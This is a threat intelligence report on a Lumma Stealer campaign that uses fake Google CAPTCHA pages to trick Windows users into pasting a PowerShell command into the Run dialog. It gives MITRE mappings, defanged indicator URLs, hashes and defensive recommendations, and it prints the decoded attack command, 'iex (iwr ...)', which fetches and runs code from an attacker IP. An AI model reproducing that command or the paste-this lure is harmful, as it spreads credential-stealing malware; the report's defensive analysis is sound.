Short Summary:
A new method of distributing Lumma Stealer malware has been identified, targeting Windows users through deceptive human verification pages. This technique, discovered by Unit42 at Palo Alto Networks, utilizes fake Google CAPTCHA pages to execute PowerShell commands that download the malware.
Key Points:
- Target: Windows users via deceptive human verification pages.
- Technique involves fake Google CAPTCHA prompts.
- PowerShell commands are executed to download Lumma Stealer from remote servers.
- Malicious sites hosted on various platforms, including CDNs and Amazon S3.
- Attackers use clipboard manipulation and base64 encoding to evade detection.
- Recommendations include user education and robust endpoint protection.
MITRE ATT&CK TTPs – created by AI
- Command and Scripting Interpreter (T1059)
- Procedure: PowerShell commands executed to download Lumma Stealer.
- Phishing (T1566)
- Procedure: Fake Google CAPTCHA pages used to lure users into executing malicious commands.
- Remote File Copy (T1105)
- Procedure: Downloading Lumma Stealer from remote servers using PowerShell.
- Clipboard Data Manipulation (T1115)
- Procedure: Copying malicious PowerShell commands to the clipboard via user interaction.
Category: Adversary Intelligence
Industry: Multiple
Motivation: Cyber Crime/Financial
Region: Global
TLP: GEEEN
Executive Summary
A new and sophisticated method of distributing Lumma Stealer malware has been uncovered, targeting Windows users through deceptive human verification pages. This technique, initially discovered by Unit42 at Palo Alto Networks, has prompted further investigation into similar malicious sites.
After our investigation, we have identified more active malicious sites spreading the Lumma Stealer. It’s important to note that while this technique is currently being used to distribute Lumma Stealer, it could potentially be leveraged to deliver any type of malicious malware to unsuspecting users.
Analysis and Attribution
Modus Operandi
Threat actors create phishing sites hosted on various providers, often utilizing Content Delivery Networks (CDNs). These sites present users with a fake Google CAPTCHA page.
- Upon clicking the “Verify” button, users are presented with unusual instructions:some text
- Open the Run dialog (Win+R)
- Press Ctrl+V
- Hit Enter
- Unbeknownst to the user, this action executes a hidden JavaScript function that copies a base64-encoded PowerShell command to the clipboard.
- The PowerShell command, when executed, downloads the Lumma Stealer malware from a remote server.
Technical Analysis
Our research team identified multiple domains hosting these malicious verification pages. The infection chain typically follows this pattern:
- User visits the fake verification page
- PowerShell script is copied on the clipboard via the Clicking on the “I’m not a robot” button. Once inspecting the source code of the phishing sites can also reveal the command which is being copied.
- Once the user pastes the PowerShell command into the Run dialog box, it will run PowerShell in a hidden window and execute the Base64-encoded command: powershell -w hidden -eC
- The decoded Base64 command, iex (iwr http://165.227.121.41/a.txt -UseBasicParsing).Content, will fetch the content from the a.txt file hosted on the remote server. This content will then be parsed and executed using Invoke-Expression.
- The a.txt file contains additional commands to download the Lumma Stealer onto the victim’s device, hosted at: https://downcheck.nyc3[.]cdn[.]digitaloceanspaces.com/dengo.zip
- If the downloaded file(dengo.zip) is extracted and executed on a Windows machine, the Lumma Stealer will become operational and establish connections with attacker-controlled domains.
Notable Observations
- Malicious pages were found on various platforms, including Amazon S3 buckets and CDN providers
- The use of base64 encoding and clipboard manipulation demonstrates the attackers’ efforts to evade detection
- The initial executable often downloads additional components, complicating analysis and potentially allowing for modular functionality
- Although this campaign primarily targets distributing Lumma Stealer malware, it has the potential to deceive users into downloading various types of malicious files onto their Windows devices.
Recommendations
- Educate Employees/Users about this new social engineering tactic, emphasizing the danger of copying and pasting unknown commands.
- Implement and maintain robust endpoint protection solutions capable of detecting and blocking PowerShell-based attacks.
- Monitor network traffic for suspicious connections to newly registered or uncommon domains.
- Regularly update and patch all systems to mitigate potential vulnerabilities exploited by the Lumma Stealer malware.
Malicious Fake URLs
- hxxps[://]heroic-genie-2b372e[.]netlify[.]app/please-verify-z[.]html
- hxxps[://]fipydslaongos[.]b-cdn[.]net/please-verify-z[.]html
- hxxps[://]sdkjhfdskjnck[.]s3[.]amazonaws[.]com/human-verify-system[.]html
- hxxps[://]verifyhuman476[.]b-cdn[.]net/human-verify-system[.]html
- hxxps[://]pub-9c4ec7f3f95c448b85e464d2b533aac1[.]r2[.]dev/human-verify-system[.]html
- hxxps[://]verifyhuman476[.]b-cdn[.]net/human-verify-system[.]html
- hxxps[://]newvideozones[.]click/veri[.]html
- hxxps[://]ch3[.]dlvideosfre[.]click/human-verify-system[.]html
- hxxps[://]newvideozones[.]click/veri[.]html
- hxxps[://]ofsetvideofre[.]click
Type | Name | Value
File | dengo.zip | 7c348f51d383d6587e2beac5ff79bef2e66c31d7
IP | Downloader Server IP | 165.227.121.41
PE Exec File | tr7 | e002696bb7d57315b352844cebc031e18e89f29e
PE Exec File | 2ndhsoru |766c266506918b467bf35db701c9b0954a616b58
References
Appendix
CloudSEK Threat Research and Information Analytics Division
Source: https://www.cloudsek.com/blog/unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages